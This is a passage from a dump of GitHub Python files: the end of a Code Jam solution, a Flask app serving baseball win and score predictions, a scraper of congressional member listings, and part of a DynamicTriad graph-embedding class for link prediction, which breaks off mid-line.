saved.append(0)\r\n\r\n saved.sort()\r\n ans = timeToN(N, C, a, s)\r\n if L > 0: ans -= sum(saved[-1*L:])\r\n\r\n return str(ans);\r\n\r\ndef process(data):\r\n out = \"\"\r\n for i in range(1, len(data)):\r\n if i > 1: out += '\\n'\r\n out += \"Case #\" + str(i) + \": \"\r\n out += solveCase(data[i])\r\n return out\r\n\r\ndef main(fn):\r\n iFile = open(fn + \".in\", \"r\")\r\n oFile = open(fn + \".out\", \"w\")\r\n print(\"Files opened.\")\r\n\r\n data = []\r\n while True:\r\n line = iFile.readline()\r\n if not line: break\r\n data.append(line)\r\n\r\n out = process(data)\r\n print(\"Calculations complete. Outputting to file.\")\r\n oFile.writelines(out)\r\n print(\"Output complete.\")\r\n iFile.close()\r\n oFile.close()\r\n print(\"Files closed.\")\r\n\r\nmain(\"small\")\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_85/129.py","file_name":"129.py","file_ext":"py","file_size_in_byte":1753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31358154670","text":"from flask import Flask, request, render_template\r\nimport pickle\r\nimport numpy as np\r\nfrom flask import request\r\nimport pandas as pd\r\nimport tensorflow as tf\r\nfrom datetime import date, timedelta, datetime\r\nimport sqlite3\r\nimport re\r\n\r\n\r\nteamAbbr = [\"CHN\",\"PHI\",\"PIT\", \"CIN\", \"SLN\", \"BOS\", \"CHA\",\r\n\t\t\t\t\"CLE\", \"DET\", \"NYA\", \"BAL\", \"LAN\", \"SFN\", \"MIN\",\r\n\t\t\t \"HOU\", \"NYN\", \"ATL\", \"OAK\", \"KCA\", \"SDN\", \"TEX\",\r\n\t\t\t\t\"TOR\", \"SEA\", \"FLO\", \"COL\", \"ANA\", \"TBA\", \"ARI\",\r\n\t\t\t\t\"MIL\", \"WAS\"]\r\n\r\napp = Flask(__name__)\r\napp.config[\"TEMPLATES_AUTO_RELOAD\"] = True\r\n\r\n\r\n@app.route('/')\r\n@app.route(\"/\")\r\ndef home(day=str(date.today())):\r\n date_object = datetime.strptime(day, '%Y-%m-%d')\r\n\r\n next_date_object = date_object + timedelta(days=1)\r\n next_day = datetime.strftime(next_date_object, '%Y-%m-%d')\r\n previous_date_object = date_object - timedelta(days=1)\r\n previous_day = datetime.strftime(previous_date_object, '%Y-%m-%d')\r\n\r\n connection = sqlite3.connect('/app/games/gamesSchedule.db')\r\n #connection = sqlite3.connect(\"C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\games\\\\gamesSchedule.db\")\r\n crsr = connection.cursor()\r\n\r\n sql_command = \"SELECT homeTeam, awayTeam, gameDate, gameTime,\" \\\r\n \" xgbPredHomeScore, xgbPredAwayScore, logHomeWinPred, logAwayWinPred FROM games WHERE gamedate = \" + \"'\" + str(day) + \"'\"\r\n games = pd.DataFrame(crsr.execute(sql_command), columns=['Home Team', 'Away Team', 'gameDate', 'gameTime',\r\n 'xgbPredHomeScore', 'xgbPredAwayScore',\r\n 'logHomeWinPrediction', 'logAwayWinPrediction'])\r\n\r\n gameData=createJSON(games, mode=1)\r\n return render_template('result.html',games=gameData, day=day, previous_day=previous_day, next_day=next_day)\r\n\r\n@app.route('/predict',methods=['GET','POST'])\r\ndef get_win():\r\n logModel = pickle.load(open('/app/data-scraper/logmodel.pkl', 'rb'))\r\n linModel = tf.keras.models.load_model('/app/neural-net/models/regModel')\r\n data = pd.read_csv('/app/data-scraper/team_averages.csv')\r\n\r\n #logModel = pickle.load(open('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\data-scraper\\\\logmodel.pkl', 'rb'))\r\n #linModel = pickle.load(open('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\data-scraper\\\\linmodel.pkl', 'rb'))\r\n #linModel = tf.keras.models.load_model('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\neural-net\\\\models\\\\regModel')\r\n #data = pd.read_csv('C:\\\\Users\\\\delevan\\\\PycharmProjects\\\\Senior-Project\\\\data-scraper\\\\team_averages.csv')\r\n teamNames = []\r\n matchupData = []\r\n\r\n for x in range(30):\r\n abbreviation = teamAbbr[x]\r\n teamNames.append(convertName(abbreviation))\r\n\r\n if request.method == \"POST\":\r\n awayName = request.form.get(\"Away Team\")\r\n homeName = request.form.get(\"Home Team\")\r\n\r\n awayAbbr = convertAbbr(awayName)\r\n homeAbbr = convertAbbr(homeName)\r\n\r\n\r\n matchup = pd.DataFrame(columns=['Home Team', 'Away Team', 'Game Time'])\r\n matchup.loc[1] = [homeAbbr, awayAbbr, \"September 21, 2019\"]\r\n logDF = modifyDF(data,matchup)\r\n logDF.drop(['Win', 'teamAbbr'], axis=1, inplace=True)\r\n winPredictions = logModel.predict(logDF)\r\n\r\n linearDF = modifyLinear(data, matchup)\r\n linearDF.drop(['Win', 'teamAbbr'], axis=1, inplace=True)\r\n print(linearDF.dtypes)\r\n scorePredictions = linModel.predict(linearDF)\r\n\r\n matchupData = createJSON(matchup, winPredictions, scorePredictions, mode=2)\r\n\r\n return render_template('matchup.html',teams = teamNames, predictions=matchupData)\r\n\r\ndef createJSON(games, predictions=None, scores=None, mode=1):\r\n gameDataFinal = []\r\n gameData = {}\r\n keys = [\"Time\", \"HomeTeamAbbr\",\"HomePrediction\",\"HomeLogoPath\",\"HomeScore\", \"AwayTeamAbbr\",\"AwayPrediction\",\"AwayLogoPath\", \"AwayScore\"]\r\n #labels = predictions.astype(np.int32)\r\n\r\n if (mode == 1):\r\n for x in range(games.shape[0]):\r\n\r\n homeTeamName = convertName(games.iloc[x, 0])\r\n awayTeamName = convertName(games.iloc[x, 1])\r\n\r\n gameDate = games.iloc[x, 2]\r\n\r\n gameTime = games.iloc[x, 3]\r\n\r\n homeScorePrediction = games.iloc[x, 4]\r\n awayScorePrediction = games.iloc[x, 5]\r\n\r\n homeTeamPrediction = games.iloc[x, 6]\r\n awayTeamPrediction = games.iloc[x, 7]\r\n\r\n # Checks and balances\r\n # Tie Predicted\r\n if((homeScorePrediction == awayScorePrediction) and homeTeamPrediction == 1):\r\n homeScorePrediction = homeScorePrediction + 1\r\n # Tie Predicted\r\n elif((homeScorePrediction == awayScorePrediction) and homeTeamPrediction == 0):\r\n awayScorePrediction = awayScorePrediction + 1\r\n\r\n elif((homeTeamPrediction == 1) and homeScorePrediction < awayScorePrediction):\r\n homeTeamPrediction = 0\r\n awayTeamPrediction = 1\r\n\r\n elif((awayTeamPrediction == 1) and awayScorePrediction < homeScorePrediction):\r\n awayTeamPrediction = 0\r\n homeTeamPrediction = 1\r\n\r\n regex = re.compile('\\d+-(\\d{2})-\\d+')\r\n month = regex.findall(gameDate)\r\n\r\n month = convertMonth(int(month[0].lstrip('0')))\r\n\r\n regex = re.compile('\\d+-\\d{2}-(\\d{2})')\r\n day = regex.findall(gameDate)\r\n\r\n date = day[0].lstrip('0')\r\n\r\n gameDate = month + \" \" + date + \" @ \" + gameTime\r\n\r\n values = [gameDate, homeTeamName, int(homeTeamPrediction), \"static/\" + games.iloc[x, 0] + \"_Logo.png\",\r\n int(homeScorePrediction), awayTeamName, int(awayTeamPrediction),\r\n \"static/\" + games.iloc[x, 1] + \"_Logo.png\", int(awayScorePrediction)]\r\n\r\n gameData = dict(zip(keys, values))\r\n gameDataFinal.append(gameData)\r\n\r\n elif(mode == 2):\r\n labels = predictions.astype(np.int32)\r\n\r\n for x in range(games.shape[0]):\r\n\r\n awayTeamPrediction = 1\r\n awayTeamPrediction ^= labels[x]\r\n homeTeamPrediction = labels[x]\r\n homeTeamName = convertName(games.iloc[x, 0])\r\n awayTeamName = convertName(games.iloc[x, 1])\r\n homeScorePrediction = np.int32(np.floor(scores[x * 2]))\r\n awayScorePrediction = np.int32(np.floor(scores[2 * x + 1]))\r\n\r\n # Checks and balances\r\n # Tie Predicted\r\n # Make this a method\r\n if ((homeScorePrediction == awayScorePrediction) and labels[x] == 1):\r\n homeScorePrediction = homeScorePrediction + 1\r\n # Tie Predicted\r\n elif ((homeScorePrediction == awayScorePrediction) and labels[x] == 0):\r\n awayScorePrediction = awayScorePrediction + 1\r\n\r\n elif ((homeTeamPrediction == 1) and homeScorePrediction < awayScorePrediction):\r\n homeTeamPrediction = 0\r\n awayTeamPrediction = 1\r\n\r\n elif ((awayTeamPrediction == 1) and awayScorePrediction < homeScorePrediction):\r\n awayTeamPrediction = 0\r\n homeTeamPrediction = 1\r\n\r\n gameDate = games.iloc[x,2]\r\n\r\n values = [gameDate, homeTeamName, int(homeTeamPrediction),\"static/\" +games.iloc[x,0]+\"_Logo.png\",\r\n int(homeScorePrediction), awayTeamName, int(awayTeamPrediction),\r\n \"static/\" + games.iloc[x,1]+\"_Logo.png\", int(awayScorePrediction)]\r\n\r\n gameData = dict(zip(keys,values))\r\n gameDataFinal.append(gameData)\r\n\r\n return gameDataFinal\r\n\r\ndef modifyDF(data,games):\r\n df = pd.DataFrame(columns=['teamAbbr', 'Score', 'isHomeTeam', 'atBats', 'Hits',\r\n 'Doubles', 'Triples', 'homeRuns', 'Walks', 'Strikeouts', 'LOB',\r\n 'pitchersUsed', 'Errors', 'battingAverage', 'OBP', 'Slugging',\r\n 'OPS', 'Win', 'wonPrev', 'WHIP', 'KPercent', 'BBPercent', 'FIP', 'BABIP', 'ERA',\r\n 'HAllowed', 'defensiveSO'])\r\n\r\n for (idx, row) in games.iterrows():\r\n for (idx2, row2) in data.iterrows():\r\n # Set is home team to 1 and wonPrev to its value as it is an average in this row\r\n if(row2.loc['TeamAbbr'] == row.loc['Home Team']):\r\n df.loc[idx + 1] = [row2['TeamAbbr'], row2['Score'], 1, row2['atBats'],\r\n row2['Hits'], row2['Doubles'], row2['Triples'], row2['homeRuns'],\r\n row2['Walks'], row2['Strikeouts'], row2['LOB'], row2['pitchersUsed'],\r\n row2['Errors'], row2['battingAverage'], row2['OBP'], row2['Slugging'],\r\n row2['OPS'], row2['Win'], row2['wonPrev'], row2['WHIP'], row2['KPercent'],\r\n row2['BBPercent'], row2['FIP'], row2['BABIP'], row2['ERA'], row2['HAllowed'],\r\n row2['defensiveSO']]\r\n\r\n #print(df.tail(10))\r\n return df\r\n\r\ndef modifyLinear(data,games):\r\n df = pd.DataFrame(columns=['teamAbbr', 'isHomeTeam', 'atBats', 'Hits',\r\n 'Doubles', 'Triples', 'homeRuns', 'Walks', 'Strikeouts', 'LOB',\r\n 'Errors', 'battingAverage', 'OBP', 'Slugging',\r\n 'OPS', 'Win', 'wonPrev', 'WHIP', 'KPercent', 'BBPercent', 'FIP', 'BABIP', 'ERA',\r\n 'HAllowed', 'defensiveSO'])\r\n x = 0\r\n for (idx, row) in games.iterrows():\r\n for (idx2,row2) in data.iterrows():\r\n # Set is home team to 1 and wonPrev to its value as it is an average in this row\r\n if(row.loc['Home Team'] == row2.loc['TeamAbbr']):\r\n df.loc[x+1] = [row2['TeamAbbr'], np.float64(1), row2['atBats'],\r\n row2['Hits'], row2['Doubles'], row2['Triples'], row2['homeRuns'],\r\n row2['Walks'], row2['Strikeouts'], row2['LOB'], row2['Errors'], row2['battingAverage'], row2['OBP'], row2['Slugging'],\r\n row2['OPS'], row2['Win'], row2['wonPrev'], row2['WHIP'], row2['KPercent'],\r\n row2['BBPercent'], row2['FIP'], row2['BABIP'], row2['ERA'], row2['HAllowed'], row2['defensiveSO']]\r\n x = x + 1\r\n\r\n for (idx3,row3) in data.iterrows():\r\n if(row.loc['Away Team'] == row3.loc['TeamAbbr']):\r\n df.loc[x+1] = [row3['TeamAbbr'], np.float64(0), row3['atBats'],\r\n row3['Hits'], row3['Doubles'], row3['Triples'], row3['homeRuns'],\r\n row3['Walks'], row3['Strikeouts'], row3['LOB'], row3['Errors'], row3['battingAverage'], row3['OBP'],\r\n row3['Slugging'], row3['OPS'], row3['Win'], row3['wonPrev'], row3['WHIP'], row3['KPercent'],\r\n row3['BBPercent'], row3['FIP'], row3['BABIP'], row3['ERA'], row3['HAllowed'], row3['defensiveSO']]\r\n x = x + 1\r\n\r\n #print(df.tail(10))\r\n return df\r\n\r\ndef convertName(teamAbbr):\r\n teamNames = {\"ARI\": \"Diamondbacks\",\r\n \"ATL\": \"Braves\",\r\n \"BAL\": \"Orioles\",\r\n \"BOS\": \"Red Sox\",\r\n \"CHA\": \"White Sox\",\r\n \"CHN\": \"Cubs\",\r\n \"CIN\": \"Reds\",\r\n \"CLE\": \"Indians\",\r\n \"COL\": \"Rockies\",\r\n \"DET\": \"Tigers\",\r\n \"HOU\": \"Astros\",\r\n \"KCA\": \"Royals\",\r\n \"ANA\": \"Angels\",\r\n \"LAN\": \"Dodgers\",\r\n \"FLO\": \"Marlins\",\r\n \"MIL\": \"Brewers\",\r\n \"MIN\": \"Twins\",\r\n \"NYA\": \"Yankees\",\r\n \"NYN\": \"Mets\",\r\n \"OAK\": \"Athletics\",\r\n \"PHI\": \"Phillies\",\r\n \"PIT\": \"Pirates\",\r\n \"SDN\": \"Padres\",\r\n \"SFN\": \"Giants\",\r\n \"SEA\": \"Mariners\",\r\n \"SLN\": \"Cardinals\",\r\n \"TBA\": \"Rays\",\r\n \"TEX\": \"Rangers\",\r\n \"TOR\": \"Blue Jays\",\r\n \"WAS\": \"Nationals\"\r\n\r\n }\r\n\r\n convertedName = teamNames[teamAbbr]\r\n return convertedName\r\n\r\ndef convertAbbr(team):\r\n teamNames = {\"Diamondbacks\": \"ARI\",\r\n \"Braves\": \"ATL\",\r\n \"Orioles\": \"BAL\",\r\n \"Red Sox\": \"BOS\",\r\n \"White Sox\": \"CHA\",\r\n \"Cubs\": \"CHN\",\r\n \"Reds\": \"CIN\",\r\n \"Indians\": \"CLE\",\r\n \"Rockies\": \"COL\",\r\n \"Tigers\": \"DET\",\r\n \"Astros\": \"HOU\",\r\n \"Royals\": \"KCA\",\r\n \"Angels\": \"ANA\",\r\n \"Dodgers\": \"LAN\",\r\n \"Marlins\": \"FLO\",\r\n \"Brewers\": \"MIL\",\r\n \"Twins\": \"MIN\",\r\n \"Yankees\": \"NYA\",\r\n \"Mets\": \"NYN\",\r\n \"Athletics\": \"OAK\",\r\n \"Phillies\": \"PHI\",\r\n \"Pirates\": \"PIT\",\r\n \"Padres\": \"SDN\",\r\n \"Giants\": \"SFN\",\r\n \"Mariners\": \"SEA\",\r\n \"Cardinals\": \"SLN\",\r\n \"Rays\": \"TBA\",\r\n \"Rangers\": \"TEX\",\r\n \"Blue Jays\": \"TOR\",\r\n \"Nationals\": \"WAS\"\r\n }\r\n\r\n convertedName = teamNames[team]\r\n return convertedName\r\n\r\ndef convertMonth(month):\r\n months = {1: \"January\",\r\n 2: \"February\",\r\n 3: \"March\",\r\n 4: \"April\",\r\n 5: \"May\",\r\n 6: \"June\",\r\n 7: \"July\",\r\n 8: \"August\",\r\n 9: \"September\",\r\n 10: \"October\",\r\n 11: \"November\",\r\n 12: \"December\"}\r\n\r\n newMonth = months[month]\r\n return newMonth\r\n\r\nif __name__ == '__main__':\r\n app.run()\r\n\r\n","repo_name":"delevan98/Senior-Project","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":14018,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"16891931912","text":"import requests\nfrom bs4 import BeautifulSoup\nimport csv\n\nurl = 'https://www.house.gov/representatives'\npage = requests.get(url)\nsoup = BeautifulSoup(page.content, 'html.parser')\n\nresults = soup.find('div', class_='view-content')\nstates = results.find_all('table', class_='table')\n\np = 0\nwith open('congress.csv', 'w', newline='', encoding='utf-8') as file:\n writer = csv.writer(file)\n writer.writerow([\"First Name\", \"Last Name\", \"State\", \"C.D.\", \"Party\", \"Phone Number\"])\n for i in states:\n state_name = i.find('caption').text.strip()\n\n members = i.find('tbody').find_all('tr')\n print(state_name)\n\n for member in members:\n district, name, party, office, phone, assignment = [e.text.strip() for e in member.find_all('td')]\n if ',' in name:\n kr = name.split(\",\")\n first_name = kr[1].strip()\n last_name = kr[0].strip()\n else:\n first_name = name\n last_name = \"\"\n writer.writerow([first_name, last_name, state_name, district, party, phone])\n\n","repo_name":"Horrgs/politics","sub_path":"congress_list_scraper.py","file_name":"congress_list_scraper.py","file_ext":"py","file_size_in_byte":1094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"4427639304","text":"from __future__ import print_function\ndisp_avlbl = True\nimport os\nif os.name == 'posix' and 'DISPLAY' not in os.environ:\n disp_avlbl = False\n import matplotlib\n\n matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nimport networkx as nx\nimport sys\nsys.path.append('./')\nsys.path.append(os.path.realpath(__file__))\nfrom .static_graph_embedding import StaticGraphEmbedding\nfrom dynamicgem.utils import graph_util, plot_util, dataprep_util\nfrom dynamicgem.evaluation import visualize_embedding as viz\nfrom .sdne_utils import *\nfrom keras import backend as KBack\nimport tensorflow as tf\nimport argparse\nfrom dynamicgem.graph_generation import dynamic_SBM_graph\nimport operator\nimport time\nfrom os import sys, path\nsys.path.append(path.dirname(path.dirname(path.abspath(__file__))))\nfrom dynamicgem.dynamictriad.core import *\nfrom six.moves import cPickle\nimport importlib\nfrom os.path import isfile\nimport dynamicgem.dynamictriad.core.dataset.dataset_utils as du\nimport dynamicgem.dynamictriad.core.algorithm.embutils as eu\nfrom dynamicgem.evaluation import evaluate_link_prediction as lp\nimport pdb\nfrom sklearn.linear_model import LogisticRegression\nimport random\n\ntry:\n from sklearn.model_selection import cross_val_score, KFold, StratifiedKFold\nexcept ImportError:\n from sklearn.cross_validation import cross_val_score, KFold, StratifiedKFold\nfrom sklearn import svm\nfrom sklearn.metrics import f1_score, precision_score, recall_score, accuracy_score\n\n\nclass dynamicTriad(StaticGraphEmbedding):\n \"\"\" Initialize the embedding class\n Args:\n t : Type of data to test the code\n nm : number of nodes to migrate\n iter : number of optimization iterations\n m : argparse.SUPPRESS\n d : input directory name\n b : batchsize for training\n n : number of time steps\n K : number of embedding dimensions\n l : size of of a time steps\n s : interval between two time steps\n o : output directory name\n rd : result directory name\n lr : initial learning rate\n beta-smooth : coefficients for smooth component\n beta-triad : coefficients for triad component\n negdup : neg/pos ratio during sampling\"\n datasetmod : help='module name for dataset loading\n dataname : name for the current data file\n validation : 'link_reconstruction'\n te : 'type of test, (node_classify, node_predict, link_classify, link_predict, '\n 'changed_link_classify, changed_link_predict, all)')\n classifier : lr, svm\n repeat : number of times to repeat experiment\n sm : samples for test data\n \"\"\"\n\n def __init__(self, d, *hyper_dict, **kwargs):\n self._d = d\n hyper_params = {\n 'method_name': 'Dynamic TRIAD',\n 'modelfile': None,\n 'weightfile': None,\n 'savefilesuffix': None\n\n }\n hyper_params.update(kwargs)\n for key in hyper_params.keys():\n self.__setattr__('_%s' % key, hyper_params[key])\n for dictionary in hyper_dict:\n for key in dictionary:\n self.__setattr__('_%s' % key, dictionary[key])\n self.clf = self.__make_classifier()\n self._model = None\n # self._clname='lr' \n\n def __make_classifier(self):\n class_weight = 'balanced'\n\n if self._clname == 'svm':\n return svm.SVC(kernel='linear', class_weight=class_weight)\n elif self._clname == 'lr':\n return LogisticRegression(class_weight=class_weight)\n else:\n raise NotImplementedError()\n\n def load_trainmod(self, modname):\n mod = importlib.import_module(modname)\n return getattr(mod, 'Model')\n\n def load_datamod(self, modname):\n mod = importlib.import_module(modname)\n return getattr(mod, 'Dataset')\n\n def load_or_update_cache(self, ds, cachefn):\n if cachefn is None:\n return\n cachefn += '.cache'\n if isfile(cachefn + '.args'):\n args = cPickle.load(open(cachefn + '.args', 'r'))\n try:\n ds.load_cache(args, lambda: cPickle.load(open(cachefn, 'r')))\n print(\"Data loaded from cache file {}\".format(cachefn))\n return\n except (ValueError, EOFError) as e:\n print(\"Failed to load cache file {}: {}\".format(cachefn, e.message))\n\n # update cache\n print(\"updating cache file for prefix {}\".format(cachefn))\n ar, args = ds.cache()\n cPickle.dump(args, open(cachefn + '.args', 'w'))\n cPickle.dump(ar, open(cachefn, 'w'))\n print(\"cache file {} updated\".format(cachefn))\n\n def export(self, vertices, data, outdir):\n\n outdir = outdir + '/' + self._datatype\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n outdir = outdir + '/dynTriad'\n if not os.path.exists(outdir):\n os.mkdir(outdir)\n for i in range(len(data)):\n assert len(vertices) == len(data[i]), (len(vertices), len(data[i]))\n fn = \"{}/{}.out\".format(outdir, i)\n fh = open(fn, 'w')\n for j in range(len(vertices)):\n print(\"{} {}\".format(vertices[j], ' '.join([\"{:.3f}\".format(d) for d in data[i][j]])), file=fh)\n fh.close()\n\n def load_embedding(self, fn, vs):\n data = open(fn, 'r').read().rstrip('\\n').split('\\n')\n emb = {}\n for line in data:\n fields = line.split()\n emb[fields[0]] = [float(e) for e in fields[1:]]\n # it is possible that the output order differs from :param vs: given different node_type,\n # so we have to reorder the embedding according to :param vs:\n emb = [emb[str(v)] for v in vs]\n\n return np.vstack(emb)\n\n def get_method_name(self):\n return self._method_name\n\n def get_method_summary(self):\n return '%s_%d' % (self._method_name, self._d)\n\n def learn_embedding(self):\n\n # TensorFlow wizardry\n config = tf.ConfigProto()\n\n # Don't pre-allocate memory; allocate as-needed\n config.gpu_options.allow_growth = True\n\n # Only allow a total of half the GPU memory to be allocated\n config.gpu_options.per_process_gpu_memory_fraction = 0.2\n\n # Create a session to pass the above configuration\n sess = tf.Session(config=config)\n\n # Create a tensorflow debugger wrapper\n # sess = tf_debug.LocalCLIDebugWrapperSession(sess) \n\n # Create a session with the above options specified.\n KBack.tensorflow_backend.set_session(sess)\n\n TrainModel = self.load_trainmod(self._trainmod)\n Dataset = self.load_datamod(self._datasetmod)\n\n ds = Dataset(self._datafile, self._starttime, self._nsteps, stepsize=self._stepsize,\n stepstride=self._stepstride)\n # self.load_or_update_cache(ds, self._cachefn)\n # dsargs = {'datafile': self._datafile, 'starttime': self._starttime, 'nsteps': self._nsteps,\n # 'stepsize': self._stepsize, 'stepstride': self._stepstride, 'datasetmod': self._datasetmod}\n tm = TrainModel(ds, pretrain_size=self._pretrain_size, embdim=self._embdim, beta=self._beta,\n lr=self._lr, batchsize=self._batchsize, sampling_args=self._sampling_args)\n\n edgecnt = [g.num_edges() for g in ds.gtgraphs]\n k_edgecnt = sum(edgecnt[:self._pretrain_size])\n print(\"{} edges in pretraining graphs\".format(k_edgecnt))\n\n if self._pretrain_size > 0:\n initstep = int(ds.time2step(self._starttime))\n tm.pretrain_begin(initstep, initstep + self._pretrain_size)\n\n print(\"generating validation set\")\n validargs = tm.dataset.sample_test_data(self._validation, initstep, initstep + self._pretrain_size,\n size=10000)\n # print(validargs)\n print(\"{} validation samples generated\".format(len(validargs[0])))\n\n max_val, max_idx, maxmodel = -1, 0, None\n\n # for early stopping\n start_time = time.time()\n scores = []\n for i in range(self._niters):\n tm.pretrain_begin_iteration()\n\n epoch_loss = 0\n for batidx, bat in enumerate(tm.batches(self._batchsize)):\n inputs = tm.make_pretrain_input(bat)\n l = tm.pretrain['lossfunc'](inputs)\n if isinstance(l, (list, tuple)):\n l = l[0]\n epoch_loss += l\n print(\"\\repoch {}: {:.0%} completed, cur loss: {:.3f}\".format(i, float(batidx * self._batchsize)\n / tm.sample_size(), l.flat[0]),\n end='')\n sys.stdout.flush()\n tm.pretrain_end_iteration()\n\n print(\" training completed, total loss {}\".format(epoch_loss), end='')\n\n # without validation, the model exists only after I iterations\n if self._validation != 'none':\n val_score = tm.validate(self._validation, *validargs)\n\n if val_score > max_val:\n max_val = val_score\n max_idx = i\n maxmodel = tm.save_model()\n print(\", validation score {:.3f}\".format(val_score))\n else:\n max_idx, max_val = i, epoch_loss\n # maxmodel is not saved here in order to save time\n print(\"\")\n\n # checkpoint disabled\n # if i % 5 == 0:\n # lastmodel = tm.save_model()\n # if args.validation == 'none':\n # maxmodel = lastmodel\n #\n # tm.restore_model(maxmodel) # restore parameters while preserving other info\n # cPickle.dump([tm.archive(), dsargs, lastmodel], open(self._outdir, 'w'))\n # tm.restore_model(lastmodel)\n\n if self._validation != 'none':\n scores.append(val_score)\n if max_val > 0 and i - max_idx > 5:\n break\n\n print(\"best validation score at itr {}: {}\".format(max_idx, max_val))\n print(\"{} seconds elapsed for pretraining\".format(time.time() - start_time))\n # lastmodel = tm.save_model() # for debug\n print(\"saving output to {}\".format(self._outdir))\n tm.restore_model(maxmodel)\n tm.pretrain_end()\n self.export(tm.dataset.mygraphs['any'].vertices(), tm.export(), self._outdir)\n\n # online training disabled\n startstep = int(tm.dataset.time2step(self._starttime))\n for y in range(startstep + self._pretrain_size, startstep + self._nsteps):\n raise NotImplementedError()\n\n def get_embedding(self):\n self._X = dataprep_util.getemb_dynTriad(self._outdir + '/' + self._testDataType + '/dynTriad', self._nsteps,\n self._embdim)\n return self._X\n\n def get_edge_weight(self, t, i, j):\n try:\n feat = np.fabs(self._X[t][i, :] - self._X[t][j, :])\n # val= 1/(1+np.mean(np.fabs(self._X[t][i,:]- self._X[t][j,:])))\n # val= 1/(1+np.linalg.norm(self._X[t][i,:]- self._X[t][j,:]))\n # print(val)\n # pdb.set_trace()\n # return self._model.predict_proba(np.reshape(feat,[1,-1]))[0][1]\n return self._model.predict(np.reshape(feat, [1, -1]))[0]\n # return val\n except:\n pdb.set_trace()\n\n def get_reconstructed_adj(self, t, X=None, node_l=None):\n if X is not None:\n node_num = X.shape[0]\n # self._X = X\n else:\n node_num = self._node_num\n adj_mtx_r = np.zeros((node_num, node_num))\n for v_i in range(node_num):\n for v_j in range(node_num):\n if v_i == v_j:\n continue\n adj_mtx_r[v_i, v_j] = self.get_edge_weight(t, v_i, v_j)\n return adj_mtx_r\n\n def sample_link_reconstruction(self, g, sample_nodes=None, negdup=1):\n pos = []\n # assert not g.is_directed()\n # for g in graphs:\n for e in g.edges():\n if int(e[0]) > int(e[1]):\n # check symmetric\n names = list(g.nodes())\n assert g.edges(e[0], e[1]), \"{}: {} {}\".format(names[e[0]],\n names[e[1]])\n continue\n pos.append([int(e[0]), int(e[1])])\n pos = np.vstack(pos).astype('int32')\n\n neg = []\n vsize = len(g.nodes())\n nodenames = list(g.nodes())\n for i in range(negdup):\n for p in pos:\n src, tgt = p\n # g = self.mygraphs[tm + intv]\n assert g.out_degree(nodenames[src]) < vsize - 1 or g.out_degree(nodenames[tgt]) < vsize - 1, \\\n \"We do not expect any node to connect to all other nodes\"\n\n while True:\n if random.randint(0, 1) == 0: # replace source\n # cur_range = negrange[tm][tgt]\n # new_src = cur_range[random.randint(0, len(cur_range) - 1)]\n new_src = random.randint(0, vsize - 1)\n if not g.has_edge(nodenames[new_src], nodenames[tgt]):\n neg.append([new_src, tgt])\n break\n else: # replace target\n # cur_range = negrange[tm][src]\n # new_tgt = cur_range[random.randint(0, len(cur_range) - 1)]\n new_tgt = random.randint(0, vsize - 1)\n if not g.has_edge(nodenames[src], nodenames[new_tgt]):\n neg.append([src, new_tgt])\n break\n neg = np.vstack(neg).astype('int32')\n\n lbs = np.concatenate((np.ones(len(pos)), -np.ones(len(neg))))\n return np.concatenate((pos, neg), axis=0), lbs\n\n class ResultPresenter(object):\n def __init__(self):\n self.f1, self.prec, self.rec, self.acc = [], [], [], []\n\n def add_result(self, res):\n self.prec.extend(res[0])\n self.rec.extend(res[1])\n self.f1.extend(res[2])\n self.acc.extend(res[3])\n\n def show_result(self):\n print(\"precision mean: {} std: {}\".format(np.mean(self.prec), np.std(self.prec)))\n print(\"recall mean: {} std: {}\".format(np.mean(self.rec), np.std(self.rec)))\n print(\"f1 mean: {} std: {}\".format(np.mean(self.f1), np.std(self.f1)))\n print(\"accuracy mean: {} std: {}\".format(np.mean(self.acc), np.std(self.acc)))\n\n def __classify(self, feat, lbs):\n sm = None\n\n poscnt, negcnt = np.sum(lbs == 1), np.sum(lbs == -1)\n print(\"classifying with pos:neg = {}:{}\".format(poscnt, negcnt))\n\n try:\n cv = StratifiedKFold(n_splits=5, shuffle=True)\n parts = cv.split(feat, lbs)\n except TypeError:\n cv = StratifiedKFold(lbs, n_folds=5, shuffle=True)\n parts = cv\n\n f1, prec, rec, acc = [], [], [], []\n for tr, te in parts:\n if sm is not None:\n x, y = sm.fit_sample(feat[tr], lbs[tr])\n # x, y = feat[tr], lbs[tr]\n else:\n x, y = feat[tr], lbs[tr]\n model = self.clf.fit(x, y)\n p = model.predict(feat[te])\n # self._model=model\n # if self.debug:\n # print(\"results:\", p, lbs[te])\n # print(p,np.shape(p))\n f1.append(f1_score(lbs[te], p))\n prec.append(precision_score(lbs[te], p))\n rec.append(recall_score(lbs[te], p))\n acc.append(accuracy_score(lbs[te], p))\n # idx = np.random.permutation(len(lbs))\n # x,y = feat[idx], lbs[idx]\n # self._model=self.clf.fit(x, y) \n return prec, rec, f1, acc\n\n def link_predict(self, g, t, intv=0, repeat=1):\n samp, lbs = self.sample_link_reconstruction(g, sample_nodes=None, negdup=1)\n # pdb.set_trace()\n # TODO: different feature generation method might be used here\n try:\n feat = np.fabs(self._X[t][samp[:, 0]] - self._X[t][samp[:, 1]])\n except:\n pdb.set_trace()\n print(\"feature shape {}\".format(feat.shape))\n\n # rp = self.ResultPresenter()\n # for i in range(repeat):\n # res = self.__classify(feat, lbs)\n # rp.add_result(res)\n # rp.show_result()\n\n idx = np.random.permutation(len(lbs))\n x, y = feat[idx], lbs[idx]\n self._model = self.clf.fit(x, y)\n\n def predict_next_adj(self, t, node_l=None):\n if node_l is not None:\n return self.get_reconstructed_adj(t, node_l)\n else:\n return self.get_reconstructed_adj(t)\n\n def plotresults(self, dynamic_sbm_series):\n plt.figure()\n plt.clf()\n viz.plot_static_sbm_embedding(self._X[-4:], 